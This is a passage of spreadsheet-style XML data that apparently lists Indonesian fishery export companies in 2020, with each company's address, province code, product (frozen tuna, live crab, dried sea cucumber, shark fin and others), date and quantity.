    <d v="2020-02-03T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Australia"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16729"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Labi-Labi Hidup"/>
    <d v="2020-04-15T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16730"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Perut Ikan Beku"/>
    <d v="2020-04-15T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16731"/>
    <x v="473"/>
    <s v="CV. BUMI PERTIWI"/>
    <s v="Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar"/>
    <d v="2020-04-15T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16850"/>
    <x v="234"/>
    <s v="PT. MURIA BAHARI INDONESIA"/>
    <s v="Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Barakuda, Terbang, Kuwe, Tembang, Julung-julung, Kembung, Layaran, Selar, Layang, Tenggiri)"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16892"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="500"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16898"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Betutu Hidup"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="500"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16904"/>
    <x v="142"/>
    <s v="CV. LINTAS SAMUDERA MANDIRI"/>
    <s v="Kompleks PPI Lonrae Kav 3, Kel. Lonrae, Kec. Tanete Riattang Timur, Kabupaten Bone&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16905"/>
    <x v="142"/>
    <s v="CV. LINTAS SAMUDERA MANDIRI"/>
    <s v="Kompleks PPI Lonrae Kav 3, Kel. Lonrae, Kec. Tanete Riattang Timur, Kabupaten Bone&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Tenggiri, Cakalang, Baby Tuna, Deho)"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16906"/>
    <x v="142"/>
    <s v="CV. LINTAS SAMUDERA MANDIRI"/>
    <s v="Kompleks PPI Lonrae Kav 3, Kel. Lonrae, Kec. Tanete Riattang Timur, Kabupaten Bone&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kerapu, Sunu, Kakaktua)"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16907"/>
    <x v="142"/>
    <s v="CV. LINTAS SAMUDERA MANDIRI"/>
    <s v="Kompleks PPI Lonrae Kav 3, Kel. Lonrae, Kec. Tanete Riattang Timur, Kabupaten Bone&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Cumi-Cumi, Gurita, Sotong)"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16909"/>
    <x v="474"/>
    <s v="PT. INTI LUHUR FUJA ABADI"/>
    <s v="Jl. Raya Cangkringmalang Km 6, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-05-12T00:00:00"/>
    <n v="26980"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16910"/>
    <x v="475"/>
    <s v="PT. INTI MULIA CAHAYA"/>
    <s v="Kompleks Pelabuhan Paotere Makassar, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="40000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16914"/>
    <x v="476"/>
    <s v="PT. MILYAR JAYA SUMBER DAGANG"/>
    <s v="Pergudangan Mutiara Tambak Langon D-27, Kel. Tambak Langon, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="21000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16915"/>
    <x v="477"/>
    <s v="PT. BARAMUDA BAHARI"/>
    <s v="Desa Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16916"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Tolitoli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Kerang Hidup"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16917"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Tolitoli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Kerang Segar"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16918"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Tolitoli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Kerang Beku"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16919"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Tolitoli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Bulu Babi Segar"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16920"/>
    <x v="478"/>
    <s v="PT. CAKRAWALA MITRA BAHARI"/>
    <s v="Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Tolitoli&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Bulu Babi Beku"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16927"/>
    <x v="479"/>
    <s v="PT. KELOLA MINA LAUT UNIT I"/>
    <s v="Jl. KIG Raya Selatan Kav C-5 &amp; C-13 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="1000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16928"/>
    <x v="480"/>
    <s v="PT. PAPUA FISHINDO JAYA"/>
    <s v="Jl. Perikanan RT 002 RW 004, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Segar (Kakap, Kerapu)"/>
    <d v="2020-01-24T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16929"/>
    <x v="480"/>
    <s v="PT. PAPUA FISHINDO JAYA"/>
    <s v="Jl. Perikanan RT 002 RW 004, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demesal Beku (Kakap, Kerapu)"/>
    <d v="2020-01-24T00:00:00"/>
    <n v="500"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16948"/>
    <x v="338"/>
    <s v="PT. ETMIECO MAKMUR ABADI"/>
    <s v="Jl. Samuel Languyu No.8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tepung Ikan"/>
    <d v="2020-01-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16960"/>
    <x v="481"/>
    <s v="PT, NUGRAHA ALAM TUNAS NUSANTARA"/>
    <s v="Batu Kapal RT 002 RW 004, Kel, Ranai, Kec, Bungaran Timur, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar  (Angoli, Kerapu, Ekor Kuning)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16961"/>
    <x v="481"/>
    <s v="PT, NUGRAHA ALAM TUNAS NUSANTARA"/>
    <s v="Batu Kapal RT 002 RW 004, Kel, Ranai, Kec, Bungaran Timur, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Angoli, Kerapu, Ekor Kuning)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16962"/>
    <x v="481"/>
    <s v="PT, NUGRAHA ALAM TUNAS NUSANTARA"/>
    <s v="Batu Kapal RT 002 RW 004, Kel, Ranai, Kec, Bungaran Timur, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16963"/>
    <x v="481"/>
    <s v="PT, NUGRAHA ALAM TUNAS NUSANTARA"/>
    <s v="Batu Kapal RT 002 RW 004, Kel, Ranai, Kec, Bungaran Timur, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Tongkol, Layang, Mata Besar, Tenggiri)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="25000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16964"/>
    <x v="481"/>
    <s v="PT, NUGRAHA ALAM TUNAS NUSANTARA"/>
    <s v="Batu Kapal RT 002 RW 004, Kel, Ranai, Kec, Bungaran Timur, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-Cumi)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16966"/>
    <x v="481"/>
    <s v="PT. NUGRAHA ALAM TUNAS NUSANTARA"/>
    <s v="Batu Kapal RT 002 RW 004, Kel. Ranai, Kec. Bungaran Timur, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Cumi-Cumi)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16971"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kepiting Beku"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16976"/>
    <x v="482"/>
    <s v="CV. PRAYOGA ADI SEJAHTERA"/>
    <s v="Dusun Geneng RT 02 RW 04, Kel. Maron, Kec. Banyakan, Kabupaten Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Albumin"/>
    <d v="2020-02-21T00:00:00"/>
    <n v="2500"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16980"/>
    <x v="483"/>
    <s v="PT. CITRARAJA AMPAT CANNING"/>
    <s v="Jl. Ahmad Yani Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="4467"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16983"/>
    <x v="484"/>
    <s v="UD. BERKAH LAIPUU"/>
    <s v="Lingkungan I RT 003 RW 001, Kel. Pinangunian, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-02-05T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16984"/>
    <x v="484"/>
    <s v="UD. BERKAH LAIPUU"/>
    <s v="Lingkungan I RT 003 RW 001, Kel. Pinangunian, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-02-05T00:00:00"/>
    <n v="30000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16986"/>
    <x v="407"/>
    <s v="CV. LAUTAN MAS"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM 3, Kel. Mabar, Kec. Medan Deli , Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku, Scallop Beku, Mussel Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16989"/>
    <x v="485"/>
    <s v="PT. ANUGERAH BERKAH LAUTAN SEJAHTERA"/>
    <s v="Jl. Veteran Lingkar Timur Komplek Pergudangan dan Industri CIP Blok Omega No.3A, Kel. Kemiri, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16990"/>
    <x v="485"/>
    <s v="PT. ANUGERAH BERKAH LAUTAN SEJAHTERA"/>
    <s v="Jl. Veteran Lingkar Timur Komplek Pergudangan dan Industri CIP Blok Omega No.3A, Kel. Kemiri, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16991"/>
    <x v="418"/>
    <s v="PT. EBIMAS BESAR"/>
    <s v="Jl. A.Yani Km 45,6, Kel. Pulau Sari, Kec. Tambang Ulang, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="25000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16992"/>
    <x v="233"/>
    <s v="PT. MODERN MITRA SEJATI"/>
    <s v="Jl. Rungkut Industri III No.85, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="200000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16993"/>
    <x v="486"/>
    <s v="PT. TIRTA BITUNG BAHARI"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung , Kel. Aertembaga Satu, Kec. Aertembaga , Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-01-10T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16994"/>
    <x v="486"/>
    <s v="PT. TIRTA BITUNG BAHARI"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-01-10T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="16995"/>
    <x v="487"/>
    <s v="PT. ZHANG MARINA INDONESIA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Jl. Tuna Raya Blok D Kav No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="250000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17007"/>
    <x v="100"/>
    <s v="PT. SALIM JAYA"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM III, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17012"/>
    <x v="340"/>
    <s v="PT, BIOTA LAUT GANGGANG"/>
    <s v="Jl, Kebangkitan No,8, Dusun Belabelawa, Kel, Polewali, Kec, Suppa, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tepung Agar-agar"/>
    <d v="2020-02-19T00:00:00"/>
    <n v="3650000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17020"/>
    <x v="11"/>
    <s v="CV. SUMBER ASIA TRADING COMPANY"/>
    <s v="Jl. Raya Tratas No.19, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="6240000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17021"/>
    <x v="11"/>
    <s v="CV. SUMBER ASIA TRADING COMPANY"/>
    <s v="Jl. Raya Tratas No.19, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="9360000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17023"/>
    <x v="11"/>
    <s v="CV. SUMBER ASIA TRADING COMPANY"/>
    <s v="Jl. Raya Tratas No.19, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="4680000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17029"/>
    <x v="241"/>
    <s v="PT. NUANSA CIPTA MAGELLO"/>
    <s v="Jl. Kima III Kav 5 AB, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Bawal, Kembung, Lemadang, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17030"/>
    <x v="241"/>
    <s v="PT. NUANSA CIPTA MAGELLO"/>
    <s v="Jl. Kima III Kav 5 AB, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Bawal, Kembung, Lemadang, Layaran, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17031"/>
    <x v="241"/>
    <s v="PT. NUANSA CIPTA MAGELLO"/>
    <s v="Jl. Kima III Kav 5 AB, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kakap, Lencam, Kambing-kambing, Jenaha, Kerapu, Kakatua, Pinjalo, Jenggot, Kurisi)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="30000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17033"/>
    <x v="488"/>
    <s v="CV. KIRANA HIKARI INDONESIA"/>
    <s v="Dusun Glundung RT 004 RW 002, Kel. Pranti, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17034"/>
    <x v="488"/>
    <s v="CV. KIRANA HIKARI INDONESIA"/>
    <s v="Dusun Glundung RT 004 RW 002, Kel. Pranti, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="21000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17035"/>
    <x v="488"/>
    <s v="CV. KIRANA HIKARI INDONESIA"/>
    <s v="Dusun Glundung RT 004 RW 002, Kel. Pranti, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kulit Hiu Kering, Kulit Pari Kering"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="48000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17036"/>
    <x v="488"/>
    <s v="CV. KIRANA HIKARI INDONESIA"/>
    <s v="Dusun Glundung RT 004 RW 002, Kel. Pranti, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="46800"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17064"/>
    <x v="489"/>
    <s v="PT. GOLDEN CUP SEAFOOD"/>
    <s v="Jl. Gabion Perikanan No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Layur)"/>
    <d v="2020-01-16T00:00:00"/>
    <n v="150000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17065"/>
    <x v="489"/>
    <s v="PT. GOLDEN CUP SEAFOOD"/>
    <s v="Jl. Gabion Perikanan No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Cumi-cumi, Gurita, Sotong)"/>
    <d v="2020-01-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17066"/>
    <x v="489"/>
    <s v="PT. GOLDEN CUP SEAFOOD"/>
    <s v="Jl. Gabion Perikanan No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kuring)"/>
    <d v="2020-01-16T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17067"/>
    <x v="341"/>
    <s v="PT. KUSUMA KAISAN"/>
    <s v="Jl. Lintang Raya Kav E-5, Kawasan Industri Sentul, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerang Beku"/>
    <d v="2020-02-11T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17069"/>
    <x v="341"/>
    <s v="PT. KUSUMA KAISAN"/>
    <s v="Jl. Lintang Raya Kav E-5, Kawasan Industri Sentul, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-02-11T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17070"/>
    <x v="341"/>
    <s v="PT. KUSUMA KAISAN"/>
    <s v="Jl. Lintang Raya Kav E-5, Kawasan Industri Sentul, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-02-11T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17071"/>
    <x v="341"/>
    <s v="PT. KUSUMA KAISAN"/>
    <s v="Jl. Lintang Raya Kav E-5, Kawasan Industri Sentul, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ubur-ubur Kering"/>
    <d v="2020-02-11T00:00:00"/>
    <n v="360000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17074"/>
    <x v="490"/>
    <s v="PT, WAHYU PUTRA BIMASAKTI"/>
    <s v="Jl, Kima 10 Blok T No,2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Semi Refined Carrageenan"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17075"/>
    <x v="490"/>
    <s v="PT, WAHYU PUTRA BIMASAKTI"/>
    <s v="Jl, Kima 10 Blok T No,2B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Alkali Treated Cottonii Chips"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17077"/>
    <x v="491"/>
    <s v="PT. KELOLA MINA LAUT - MINI PLANT SANGKAN URIP"/>
    <s v="Jl. Raya Cirebon - Losari KM 28,5, Kel. Malaka Sari, Kec. Gebang, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Rebus Dingin"/>
    <d v="2020-01-16T00:00:00"/>
    <n v="45000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17098"/>
    <x v="278"/>
    <s v="PT. NEPTUNA DWINDO MATRINA"/>
    <s v="Selat Lampa RT 003 RW 002, Kel. Sabang Mawang Barat, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17105"/>
    <x v="492"/>
    <s v="PT. ACEH MARINA LAUT"/>
    <s v="Jl. Awe Blang No.3, Kel. Neusu Aceh, Kec. Baiturrahman, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Beku"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="300000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17106"/>
    <x v="492"/>
    <s v="PT. ACEH MARINA LAUT"/>
    <s v="Jl. Awe Blang No.3, Kel. Neusu Aceh, Kec. Baiturrahman, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Sarden, Selar, Cakalang, Tenggiri)"/>
    <d v="2020-01-24T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17107"/>
    <x v="492"/>
    <s v="PT. ACEH MARINA LAUT"/>
    <s v="Jl. Awe Blang No.3, Kel. Neusu Aceh, Kec. Baiturrahman, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Segar"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="200000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17108"/>
    <x v="492"/>
    <s v="PT. ACEH MARINA LAUT"/>
    <s v="Jl. Awe Blang No.3, Kel. Neusu Aceh, Kec. Baiturrahman, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
